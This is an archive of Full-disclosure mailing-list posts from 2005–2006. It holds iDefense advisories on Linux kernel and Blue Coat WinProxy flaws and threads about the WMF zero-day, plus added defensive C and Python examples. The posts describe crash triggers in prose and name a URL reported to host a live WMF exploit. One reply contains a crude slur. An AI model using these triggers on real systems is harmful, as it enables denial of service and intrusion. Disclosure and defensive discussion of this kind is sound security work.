08/25/2004 Initial vendor notification
08/31/2004 Initial vendor response
12/21/2005 Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2005 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.


[Full-disclosure] iDefense Security Advisory 12.22.05: Linux Kernel Socket Buffer Memory Exhaustion DoS Vulnerability

2005-12-22 Thread [EMAIL PROTECTED]

Linux Kernel Socket Buffer Memory Exhaustion DoS Vulnerability

iDefense Security Advisory 12.22.05
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=362
December 22, 2005

I. BACKGROUND

Linux is a clone of the operating system Unix, written from scratch by
Linus Torvalds with assistance from a loosely-knit team of hackers
across the Net. It aims towards POSIX and Single UNIX Specification
compliance.

More information is available from the vendor website:

 http://www.kernel.org

II. DESCRIPTION

Local exploitation of a memory exhaustion vulnerability in Linux Kernel
versions 2.4 and 2.6 can allow attackers to cause a denial of service
condition.

The vulnerability specifically exists due to a lack of resource checking
during the buffering of data for transfer over a pair of sockets. An
attacker can create a situation that, depending on the amount of
available system resources, can cause the kernel to panic due to memory
resource exhaustion. The attack is conducted by opening up a number of
connected file descriptors or socketpairs and creating the largest
possible kernel buffer for the data transfer between the two sockets. By
causing the process to enter a zombie state or closing the file
descriptor while keeping a reference open, the data is kept in the
kernel until the transfer can complete. If done repeatedly, system
memory resources can be exhausted from the kernel.

III. ANALYSIS

Successful exploitation requires an attacker to have local access to an
affected Linux system and can result in complete system denial of
service. The system may not reboot after successful exploitation,
requiring human interaction to be restored to a working state. Depending
on available resources, systems with large amounts of physical memory
may not be affected.

IV. DETECTION

iDefense has confirmed that Linux 2.4.22 and Linux 2.6.12 are
vulnerable.

V. WORKAROUND

An effective workaround is not available for this vulnerability.

VI. VENDOR RESPONSE

The maintainer acknowledges that this issue is a design limitation in
the Linux kernel. The following advice has been offered for creating a
patch. It should be noted that this patch has not been fully tested.

The patch requires three steps:

1) Add a "struct user *" reference to the "struct file" file structure.

2) Whenever creating a new "struct file" add the following code:

   struct user *user = current->user;

   /* test the pointer before dereferencing it */
   if (user && atomic_read(&user->files) > MAX_FILES_FOR_THIS_USER)
       return -EMFILE;

   file->user = user;

   if (user) {
       atomic_inc(&user->count);
       atomic_inc(&user->files);
   }

3) Whenever a "struct file" is released apply the following code:

   struct user *user = file->user;

   if (user) {
       atomic_dec(&user->files);
       free_uid(user);
   }
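A user-space model of the per-user accounting the three steps describe, as an added example written for this page (not the maintainer's patch or kernel code): plain ints stand in for the kernel's atomic_t counters, `current_user` for current->user, and `free_uid` for the kernel routine that drops a user reference; MAX_FILES_FOR_THIS_USER is a small constructed value so the cap is easy to exercise. It checks the user pointer before dereferencing it and treats the constant as an inclusive cap, which is this example's choice rather than the snippet's.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

/* Constructed, deliberately tiny limit so the cap is easy to exercise;
 * a real patch would derive this from a per-user resource limit. */
#define MAX_FILES_FOR_THIS_USER 4

/* Model of the kernel's per-user structure. The kernel uses atomic_t
 * because many tasks update these concurrently; plain ints suffice for
 * this single-threaded demonstration. */
struct user {
    int count;   /* references held on this user structure */
    int files;   /* struct file objects currently charged to the user */
};

/* Model of "struct file" with the reference the patch adds in step 1. */
struct file {
    struct user *user;
};

/* Stand-in for current->user: the user of the task doing the allocation. */
struct user *current_user = NULL;

/* Stand-in for the kernel's free_uid(): drop one reference. */
static void free_uid(struct user *user)
{
    user->count--;
}

/* Step 2: allocate a file and charge it to the current user, refusing
 * with -EMFILE once the user already holds the maximum. Returns 0 on
 * success and a negative errno otherwise, as kernel code does. */
int file_alloc(struct file **out)
{
    struct user *user = current_user;

    /* Check the pointer before touching it. */
    if (user && user->files >= MAX_FILES_FOR_THIS_USER)
        return -EMFILE;

    struct file *file = calloc(1, sizeof *file);
    if (!file)
        return -ENOMEM;

    file->user = user;
    if (user) {
        user->count++;   /* the file now holds a reference on the user */
        user->files++;   /* ... and is charged against the per-user cap */
    }
    *out = file;
    return 0;
}

/* Step 3: release a file, uncharge it and drop the user reference. */
void file_release(struct file *file)
{
    struct user *user = file->user;

    if (user) {
        user->files--;
        free_uid(user);
    }
    free(file);
}

/* Exercise the cap: open files until -EMFILE, release one, open again.
 * Returns 1 if the accounting behaved as the patch intends, else 0. */
int demo_per_user_cap(void)
{
    struct user demo_user = { 0, 0 };
    struct file *files[MAX_FILES_FOR_THIS_USER + 1] = { 0 };
    int ok = 1;

    current_user = &demo_user;
    for (int i = 0; i < MAX_FILES_FOR_THIS_USER; i++)
        ok &= (file_alloc(&files[i]) == 0);

    /* One more than the cap must be refused, and nothing charged for it. */
    ok &= (file_alloc(&files[MAX_FILES_FOR_THIS_USER]) == -EMFILE);
    ok &= (demo_user.files == MAX_FILES_FOR_THIS_USER);

    file_release(files[0]);      /* freeing one slot ... */
    files[0] = NULL;
    ok &= (file_alloc(&files[MAX_FILES_FOR_THIS_USER]) == 0);  /* ... lets the next succeed */

    for (int i = 0; i <= MAX_FILES_FOR_THIS_USER; i++)
        if (files[i])
            file_release(files[i]);
    ok &= (demo_user.files == 0 && demo_user.count == 0);  /* fully uncharged */
    current_user = NULL;
    return ok;
}

int main(void)
{
    printf("per-user file cap %s\n", demo_per_user_cap() ? "enforced" : "BROKEN");
    return 0;
}
```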

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-3660 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/17/2005 Initial vendor notification - Linux vendors
11/19/2005 Initial vendor responses
12/22/2005 Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2005 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.



RE: [Full-disclosure] Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5)

2005-12-22 Thread [EMAIL PROTECTED]
Reed Arvin wrote:
>The issue occurs when the naPrdMgr.exe process attempts to run the
>C:\Program Files\Network Associates\VirusScan\EntVUtil.EXE file. Because of
>a lack of quotes the naPrdMgr.exe process first tries to run C:\Program.exe.
>If that is not found it tries to run C:\Program Files\Network.exe. When that
>is not found it finally runs the EntVUtil.EXE file that it was originally
>intending to run. A malicious user can create an application named
>Program.exe and place it on the root of the C:\ and it will be run with
>Local System privileges by the naPrdMgr.exe process. Source code for an
>example Program.exe is listed below.

While I agree this behavior is a bug, it is not a vulnerability.  Properly
secured installations of Windows aren't susceptible to this attack because
the ACL on the root of the installation volume denies users other than
Administrators the ability to write to files.

The same ACL is in place on the Program Files directory, for obvious
reasons, and it is inherited by software installations.

Any Windows system without these ACLs in place is vulnerable to a myriad of
attacks -- see Microsoft Security Bulletin MS02-064:

http://www.microsoft.com/technet/security/bulletin/ms02-064.mspx






Re: [Full-disclosure] Someone wasted a nice bug on spyware...

2005-12-28 Thread [EMAIL PROTECTED]
I think you shouldn't be a security specialist for putting crackz.ws in
your banned website list, hehehe, this is probably the funniest
warez site around and I bet these losers don't know the
number of IE exploits they are hosting on their own domain lol...

Paul wrote:
> Indeed, this is quite an annoyance. Buytoolbar.biz/xpl.wmf also works. I
> sent it to Microsoft a few days ago and they're looking into it. It looks
> like it's going to be a bad week at MSRC :(
>
> I whoised the owners of a couple domains who host the image and got the
> following information:
>
>
>
> The name Mikhail Sergeevich Gorbachev that this domain is registered to
> leads me to believe that it is registered with false information (for those
> of you who don't know, Gorbachev was a former Soviet president).
>
>
> Domain Name: B

Re: [Full-disclosure] test this

2005-12-29 Thread [EMAIL PROTECTED]
norton detects it under the corporate version BloodHound.Exploit.56

http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.56.html

I guess you tried the norton customer version, which doesn't get its virus
definitions updated every day; companies are more at risk than poor
customers I guess.

Todd Towles wrote:
> Got a new test of it this morning? I am surprised Norton doesn't have it
> yet.
>
>  TrendMicro has released pattern file = 3.135.00
>
> It appears to pick up all the trojans using the WMF exploit as of right
> now. Variants could affect this however.
>
> Is this buffer overflow pretty specific like the older GIF exploit? If I
> remember correctly, there were really only two ways to make the GIF
> exploit work, so the detection was pretty solid. Is this exploit
> similar? Or does it have some trick point that could be used to fool
> known sigs?
>
> -Todd
>
>> -----Original Message-
>> From: [EMAIL PROTECTED]
>> [mailto:[EMAIL PROTECTED] On Behalf
>> Of Thierry Zoller
>> Sent: Wednesday, December 28, 2005 5:24 PM
>> To: full-disclosure@lists.grok.org.uk
>> Subject: Re[2]: [Full-disclosure] test this
>>
>> Dear List,
>>
>> VirusTotal on 12/29/2005 at 00:16:19 (CET) :
>> AntiVir 6.33.0.70   12.28.2005  TR/Dldr.WMF.Agent.D
>> Sophos  4.01.0  12.28.2005  Troj/DownLdr-NO
>> ClamAV  devel-20051108  12.29.2005  Exploit.WMF.A
>>
>> --
>> http://secdev.zoller.lu
>> Thierry Zoller
>> Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7
>>





Re: [Full-disclosure] Static Blocking for the WMF Exploit - over 50 known variants

2005-12-29 Thread [EMAIL PROTECTED]
I think jerome athias pubbed a working workaround about unloading a
dll but anyway the most evident countermeasure while browsing websites,
and which I guess everyone does, is to use firefox instead of IE :)

Discussion Lists wrote:
> Message Got it . . . the mscracks site is still available, so I
> have been running my tests from that, and I think I may have a
> workaround for anyone who is interested, but I need people to help
> me test it. Here's what I did:
>
> First: I created a virtual machine with SP2 installed, AVG Free AV
> and updated it.  Then I went to the mscracks site.  I did this
> running as admin on my computer BTW.  I noticed as the page came
> up, AVG Free alerted me to a bunch of infections.  Bad news.
>
> Last: I reverted the virtual machine to the pre-mscracks state
> (with SP2, and AVG Free), and updated AVG Free.  I then ran some
> code that activates Window's SAFER mechanism for Internet Explorer.
> I will attach a link at the end of the email for more info.  I
> confirmed the IE was running with reduced privs, and then opened
> MSCracks. AVG Free didn't complain once about infections and such.
>
> To me that means that reducing browser privileges thwarts this
> exploit.  Can someone else test this for me as well?  Anyone
> interested in the VBScript code I used for SAFER email me as well.
>  I will be happy to send it along.
>
>
>
> -Original Message- *From:* Larry Seltzer
> [mailto:[EMAIL PROTECTED] *Sent:* Thursday, December 29, 2005
> 9:07 AM *To:* Discussion Lists; full-disclosure@lists.grok.org.uk
> *Subject:* RE: [Full-disclosure] Static Blocking for the WMF
> Exploit - over 50 known variants
>
>>> Sorry if this was asked before, but how do I know if my machine
>>>
> has been compromised?  I am working on a way to contain any damage
> caused by this exploit, and it would be helpful to know for sure
> that what I am doing is working or not working.
>
> Unfortunately, I think the test for this is specific to each
> variant and not to the WMF vector. IOW, there is no one test.
>
> Larry Seltzer eWEEK.com Security Center Editor
> http://security.eweek.com/ http://security.eweek.com/>
> http://blog.ziffdavis.com/seltzer Contributing Editor, PC Magazine
> [EMAIL PROTECTED]
>
>
>





Re: [Full-disclosure] test this

2005-12-29 Thread [EMAIL PROTECTED]
not your fault todd, they are too gay at cert

http://www.us-cert.gov/cas/techalerts/TA05-362A.html

huhu...

Todd Towles wrote:
> 
> Peter wrote:
>> Perhaps you should read about it on Microsoft's site.
>> It's not a buffer overflow.  WMF files since at least Windows
>> 3.0 days have been allowed to carry executable code in the
>> form of their own SetAbortProc handler.  This is perfectly
>> legitimate, though the design is a poor one.  The only thing
>> that has changed is the code that is being executed.
>
> You are correct, that was my oversight in typing (minus the thinking).
> No bufferoverflow ;)
>
> -Todd





Re: [Full-disclosure] Buffer Overflow vulnerability in Windows Display Manager [Suspected]

2006-01-02 Thread [EMAIL PROTECTED]
he told me offline around 52000 chars, and you do not need to press
ok to trigger it, it's supposed to occur when you copy paste the
chars within the area, however here nothing happens on xp sp2 en +
firefox 1.5, I can just see my AAA buffer replaced by a blank buffer
once I paste it in the box..




Stan Bubrouski wrote:
> Well if you look at the fact there is no title on titlebar and the
> fact the active tab is Untitled, I'd hazard to guess its something he
> manually entered into the address bar, and so we don't even know if
> this is exploitable by clicking a link or whatnot.
>
> Not exactly sure why this was posted if no details are provided.
> Anything else for us Sumit?
>
> -sb
>
> On 1/2/06, Lise Moorveld <[EMAIL PROTECTED]> wrote:
>> Dear Sumit,
>>
>> Could you tell me how you exploited this buffer
>> overflow issue in Firefox so I can try and reproduce
>> it? I notice a lot of A's in your address bar but I'm
>> not sure whether that's it and if so, how many A's are
>> used.
>>
>> Regards,
>>
>> Lise
>>
>> --- Sumit Siddharth <[EMAIL PROTECTED]> wrote:
>>
>>> Hi,
>>> The Windows display manager crashes when a BOF is
>>> attempted on a mozilla
>>> firefox.
>>> This has different results on different windows
>>> machine.
>>> In Windows XP only the display manager crashes ,
>>> whereas on a Windows 2000
>>> server the BSOD(Blue screen of death )appears and
>>> the system hangs.
>>> I am using Firefox 1.0.6. I think that the bug is in
>>> the display driver and
>>> not with firefox. Kindly find a screen shot attached
>>> with this email.
>>>
>>> Thanks
>>> Sumit
>>>
>>>
>>> --
>>>
>>> Sumit Siddharth
>>> Information Security Analyst
>>> NII Consulting
>>> Web: www.nii.co.in
>>> 
>>> NII Security Advisories
>>> http://www.nii.co.in/resources/advisories.html
>>> 





Re: [Full-disclosure] Buffer Overflow vulnerability in Windows Display Manager [Suspected]

2006-01-03 Thread [EMAIL PROTECTED]
I haven't got such a driver here, it should be a third party driver security
bug, probably within "Controller Hub for Intel Graphics Driver"

http://www.dynamiclink.nl/htmfiles/rframes/sys-i01.htm



Sumit Siddharth wrote:
> I think the problem is with the intel driver and particularly with file
> ialmnt5.sys
> Hope it helps
> Sumit
>
>
>
> On 1/3/06, *Sumit Siddharth* <[EMAIL PROTECTED]
> <mailto:[EMAIL PROTECTED]>> wrote:
>
> Dear All,
> Sorry for the delayed response.
> I had success in exploiting it remotely by a simple javascript
> window.open("http://aa..."). But I think it
> doesn't work with some drivers. I am using XP Professional, SP2,
> and firefox 1.0.6. I am using a string of about 53,000 chars to
> overflow the buffer.
> Thanks
> Sumit
>
>
>
>
> --
>





Re: [Full-disclosure] Win32 Heap Exploits

2006-01-03 Thread [EMAIL PROTECTED]
or this is because the bug he's working on has already been discovered
& patched by an exception throwing the control to a handler; for
example, you will notice exactly the same thing for the WINS bug
discovered by n.waisman: if you try to exploit it on a
patched MS box within ollydbg, you will be able to congratulate yourself
because the debugger is able to handle the exception apart from the
program, but without it of course it's not possible, wins.exe throws us
to another point, so anyway I bet the bug you are working on has already
been discovered and patched.


Nicolas RUFF wrote:
>> But if i execute the server without ollydbg there happen nothing.
>>  Have anybody an idea what i make wrong. Test on a winxp sp1
>> system.
>
> As pointed out multiple times, Windows heap is not the same whether
> the program is flagged as "being debugged" or not.
>
> You should always *attach* the debugger to the process and not run
> the process from within the debugger.
>
> Regards, - Nicolas RUFF





Re: [Full-disclosure] WMF round-up, updates and de-mystification

2006-01-03 Thread [EMAIL PROTECTED]
he tries to be good, but everyone remembers his shit talk firing about
netdev & cie, nice try..

InfoSecBOFH wrote:
> So this patch is trusted because you said so?
>
> I have tested and confirmed that this patch only works in specific
> scnenarios and does not mitigate the entire issue.  Variations still
> work.
>
> On 1/3/06, Gadi Evron <[EMAIL PROTECTED]> wrote:
>> Quite a bit of confusing and a vast amount of information coming from
>> all directions about the WMF 0day. Here are some URL's and generic facts
>> to set us straight.
>>
>> The "patch" by Ilfak Guilfanov works, but by disabling a DLL in Windows.
>> So far no problems have been observed by anyone using this patch. You
>> should naturally check it out for yourselves but I and many others
>> recommend it until Microsoft bothers to show up with their own patch.
>>
>> Ilfak is trusted and is in no way a Bad Guy.
>>
>> You can find more information about it at his blog:
>> http://www.hexblog.com/2005/12/wmf_vuln.html
>>
>> If you are still not sure about the patch by Ilfak, check out the
>> discussion of it going on in the funsec list about the patch, with Ilfak
>> participating:
>> https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
>> Occasional information of new WMF problems keep coming in over there.
>>
>> In this URL you can find the best summary I have seen of the WMF issue:
>> http://isc.sans.org/diary.php?storyid=994
>> by the "SANS ISC diary" team.
>>
>> In this URL you can find the best write-up I have seen on the WMF issue:
>> http://blogs.securiteam.com/index.php/archives/167
>> By Matthew Murphy at the "Securiteam Blogs".
>>
>> Also, it should be noted at this time that since the first public
>> discovery of this "problem", a new one has been coming in - every day.
>> All the ones seen so far are variants of the original and in all ways
>> the SAME problem. So, it would be best to acknowledge them as the
>> same... or we will keep having a NEW 0day which really isn't for about 2
>> months when all these few dozen variations are exhausted.
>>
>> A small BUT IMPORTANT correction for future generations:
>> The 0day was originally found and reported by Hubbard Dan from Websense
>> on a closed vetted security mailing list, and later on at the Websense
>> public page. All those who took credit for it took it wrongly.
>>
>> Thanks, and a better new year to us all,
>>
>>Gadi.





Re: [Full-disclosure] WMF Exploit

2006-01-04 Thread [EMAIL PROTECTED]
I don't think so, because here win98 doesn't recognize the .wmf extension.


Technica Forensis wrote:
>> I have 2 win98 machines here, my own and a customer's, both are
>> unpatched, (one runs IE6 sp1 the other IE 5.5) I cannot find
>> shimgvw.dll on either.
>
> is GDI32.dll on either of those systems?
>
> ref: http://www.viruslist.com/en/weblog?discuss=176892530&return=1





Re: [Full-disclosure] Unofficial Microsoft patches help hackers, not security

2006-01-04 Thread [EMAIL PROTECTED]
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
everyone knows the best official patch is firefox, netdev is correct
here, it is not a good idea to spread an untested patch, someone will
release a patch soon totally removing your IE hu ;>

Morning Wood wrote:
> this happened with the last pnp exploit
> one of the worms patched the hole,
> thus ensuring their malware stayed,
> and the box was no longer vuln
> ( to the competition??? can we say adware? )
>
> looks like a growing trend.





[Full-disclosure] iDefense Security Advisory 01.05.06: Blue Coat WinProxy Remote DoS Vulnerability

2006-01-05 Thread [EMAIL PROTECTED]

Blue Coat WinProxy Remote DoS Vulnerability

iDefense Security Advisory 01.05.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363
January 05, 2006

I. BACKGROUND

Blue Coat WinProxy is an Internet sharing proxy server designed for small
to medium businesses. In addition to Internet sharing, WinProxy also
provides a series of security, anti-spam and anti-spyware capabilities.

More information can be found on the vendor's site at:

 http://www.winproxy.com/

II. DESCRIPTION

Remote exploitation of a design error in Blue Coat Systems Inc.'s
WinProxy allows attackers to cause a denial of service (DoS) condition.

The vulnerability specifically exists due to improper handling of a long
HTTP request of approximately 32,768 bytes. When such a request is
received, the process crashes while attempting to read past the end of a
memory region.

III. ANALYSIS

Successful exploitation requires an attacker to send a specially
constructed HTTP request to the WinProxy server on TCP port 80. This
will lead to a crash of the server and it will be unusable until it is
restarted.

This vulnerability may only be utilized by attackers who have access to
the network segment that contains the listening daemon, which in some
cases is a private local area network.

IV. DETECTION

iDefense has confirmed this vulnerability in WinProxy 6.0. Blue Coat has
reported that previous versions are not affected.

V. WORKAROUND

iDefense is currently unaware of any workarounds for this issue.

VI. VENDOR RESPONSE

Blue Coat has released WinProxy 6.1a to address this vulnerability.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-3187 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/12/2005  Initial vendor notification
10/12/2005  Initial vendor response
01/05/2006  Coordinated public disclosure

IX. CREDIT

FistFuXXer is credited with the discovery of this vulnerability.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.


[Full-disclosure] iDefense Security Advisory 01.05.06: Blue Coat Systems WinProxy Host Header Stack Overflow Vulnerability

2006-01-05 Thread [EMAIL PROTECTED]

Blue Coat Systems WinProxy Host Header Stack Overflow Vulnerability

iDefense Security Advisory 01.05.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=364
January 05, 2006

I. BACKGROUND

Blue Coat WinProxy is an Internet sharing proxy server designed for small
to medium businesses. In addition to Internet sharing, WinProxy also
provides a series of security, anti-spam and anti-spyware capabilities.

More information can be found on the vendor's site at:

 http://www.winproxy.com/

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Blue Coat
Systems Inc.'s WinProxy allows for the remote execution of arbitrary
code by attackers.

The vulnerability can be triggered by sending an overly long Host:
string to the web proxy service.

III. ANALYSIS

Exploitation of this vulnerability is trivial. An overly long header
directly overwrites the SEH handler for the frame, allowing control over
EIP.

IV. DETECTION

iDefense has confirmed this vulnerability in WinProxy 6.0. All previous
versions are suspected to be vulnerable.

V. WORKAROUND

Disabling the WinProxy web proxy protocol will prevent this attack.

VI. VENDOR RESPONSE

Blue Coat has released WinProxy 6.1a to address this vulnerability.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-4085 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

12/07/2005  Initial vendor notification
12/08/2005  Initial vendor response
01/05/2006  Coordinated public disclosure

IX. CREDIT

This vulnerability was discovered by FistFuXXer.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.


[Full-disclosure] iDefense Security Advisory 01.05.06: Blue Coat WinProxy Telnet DoS Vulnerability

2006-01-05 Thread [EMAIL PROTECTED]

Blue Coat WinProxy Telnet DoS Vulnerability

iDefense Security Advisory 01.05.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=365
January 05, 2006

I. BACKGROUND

Blue Coat WinProxy is an Internet sharing proxy server designed for small
to medium businesses. In addition to Internet sharing, WinProxy also
provides a series of security, anti-spam and anti-spyware capabilities.

More information can be found on the vendor's site at:

 http://www.winproxy.com/

II. DESCRIPTION

Remote exploitation of a design error in Blue Coat Systems Inc.'s
WinProxy allows attackers to cause a denial of service (DoS) condition.

The vulnerability can be triggered by sending a large string of 0xFF
characters to the telnet proxy port of the server. Sending such a string
corrupts the heap of the WinProxy process, causing it to crash.

III. ANALYSIS

Successful exploitation requires an attacker to send a stream of TCP
packets containing the 0xFF character to the WinProxy telnet server on
TCP port 23. This will lead to a crash of the server and it will be
unusable until it is restarted.

In lab tests, the heap corruption caused by this exploit led to crashes
at random locations in the process. Remote code execution is possible in
principle; however, it will likely be very hard to control and to
achieve reliably.
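The three WinProxy advisories above (an HTTP request of roughly 32,768 bytes, an overly long Host: header, and a stream of 0xFF bytes to the telnet proxy) all describe input that a front-end guard can reject and log before it reaches the proxy. The following is an added example, not iDefense's or Blue Coat's code; the size thresholds and the Verdict type are assumptions chosen below the sizes the advisories cite.

```python
"""Input guards modelled on the three Blue Coat WinProxy 6.0 advisories.

Added example, not iDefense's or Blue Coat's code.  The thresholds are
assumptions derived from the advisories: a whole HTTP request of roughly
32,768 bytes crashes the proxy (CAN-2005-3187), an overly long Host: header
overwrites the SEH handler (CAN-2005-4085), and a stream of 0xFF bytes to the
telnet proxy corrupts the heap (CAN-2005-3654).  A front-end that rejects such
input turns each crash into a logged, dropped connection.
"""
from __future__ import annotations

from dataclasses import dataclass, field

MAX_REQUEST_BYTES = 16 * 1024   # assumption: well below the ~32 KiB crash size
MAX_HEADER_VALUE = 1024         # assumption: generous for any real Host: value
MAX_IAC_RUN = 16                # assumption: longest run of 0xFF tolerated
IAC = 0xFF                      # telnet "Interpret As Command" byte


@dataclass
class Verdict:
    """Result of a guard check: accepted, or rejected with the reasons why."""
    accepted: bool
    reasons: list[str] = field(default_factory=list)


def check_http_request(raw: bytes) -> Verdict:
    """Decide whether a raw HTTP request is safe to forward to the proxy.

    Rejects requests larger than MAX_REQUEST_BYTES (the DoS advisory) and any
    header value longer than MAX_HEADER_VALUE (the Host: overflow advisory).
    """
    reasons: list[str] = []
    if len(raw) > MAX_REQUEST_BYTES:
        reasons.append(f"request too large: {len(raw)} bytes")

    head, sep, _body = raw.partition(b"\r\n\r\n")
    if not sep:
        reasons.append("incomplete header block (no CRLFCRLF)")

    lines = head.split(b"\r\n")
    request_line = lines[0] if lines else b""
    if len(request_line.split(b" ")) != 3:
        reasons.append("malformed request line")

    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if not colon:
            reasons.append(f"malformed header: {line[:40]!r}")
            continue
        value = value.strip()
        if len(value) > MAX_HEADER_VALUE:
            hdr = name.decode(errors="replace").strip()
            reasons.append(f"{hdr} header too long: {len(value)} bytes")

    return Verdict(not reasons, reasons)


def check_telnet_stream(data: bytes) -> Verdict:
    """Flag telnet data carrying a suspiciously long run of IAC (0xFF) bytes.

    A legitimate stream escapes a literal 0xFF as 0xFF 0xFF, so short runs are
    normal; a long unbroken run matches the telnet DoS advisory.
    """
    longest = run = 0
    for b in data:
        run = run + 1 if b == IAC else 0
        longest = max(longest, run)
    if longest > MAX_IAC_RUN:
        return Verdict(False, [f"IAC run of {longest} bytes exceeds {MAX_IAC_RUN}"])
    return Verdict(True)


if __name__ == "__main__":
    # Constructed samples, not captured traffic.
    samples = {
        "benign request": check_http_request(
            b"GET http://example.test/ HTTP/1.1\r\nHost: example.test\r\n\r\n"),
        "long Host header": check_http_request(
            b"GET / HTTP/1.1\r\nHost: " + b"A" * 2048 + b"\r\n\r\n"),
        "oversized request": check_http_request(
            b"POST / HTTP/1.1\r\nHost: h\r\nContent-Length: 33000\r\n\r\n"
            + b"C" * 33000),
        "telnet IAC flood": check_telnet_stream(bytes([IAC]) * 1024),
    }
    for label, verdict in samples.items():
        print(f"{label}: {'accept' if verdict.accepted else 'reject'} {verdict.reasons}")
```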

IV. DETECTION

iDefense has confirmed this vulnerability in WinProxy 6.0.

All previous versions are suspected to be vulnerable.

V. WORKAROUND

Disabling the WinProxy telnet protocol will prevent this attack.

VI. VENDOR RESPONSE

Blue Coat has released WinProxy 6.1a to address this vulnerability.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-3654 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/15/2005  Initial vendor notification
11/15/2005  Initial vendor response
01/05/2006  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.


Re: RE[Full-disclosure] WMF Risk Analysis for Win9X anyone ?

2006-01-06 Thread [EMAIL PROTECTED]
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
I don't know why, since this wmf flaw, some ppl are requesting a hotfix
for an os which anyway has a lot of remaining IE bugs unpatched.
there are tons of warez websites which will install spyware on a
fully patched win9x, and this was so long before this .wmf bug ...
You should wake up if you are seeking a 9x patch :)

Technica Forensis wrote:
>>> What ARE the real risks (or lack of them) for Win9X/ME systems ?
>
> I think the risk he is that they are running Win9x/ME.





Re: [Full-disclosure] Re: what we REALLY learned from WMF

2006-01-07 Thread [EMAIL PROTECTED]
Gadi Evron wrote:

>
> I am not criticizing Microsoft over the patch. I am happy.
>
> I am just saying that we as an industry got used to False Positives,
> slow responses, etc. We should demand more and this situation proved
> it is possible.
>
> Gadi.


Ja, all we have to do is write the patch for them, then we have great
turn around ;-)

